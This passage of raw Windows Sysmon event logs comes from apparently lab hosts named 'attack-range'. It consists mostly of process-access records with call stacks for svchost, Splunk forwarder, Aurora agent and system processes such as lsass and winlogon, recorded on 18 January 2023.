indows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016362Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016361Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016360Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016359Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016358Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E44B-63C7-FF01-00000000B002}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016357Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.608{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E44B-63C7-FF01-00000000B002}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016356Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.609{E5A8D418-E44B-63C7-FF01-00000000B002}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016355Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:31.109{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=764AA985BFAB02F80559B4CF55649133,SHA256=FDDE086CE412AEB9CA4C31F03463F1EDCDC8BA4DA263553BB49B12B94E11D1F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.739{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.694{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.619{FE4C2B44-E44B-63C7-2306-00000000AF02}55081984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E44B-63C7-2306-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 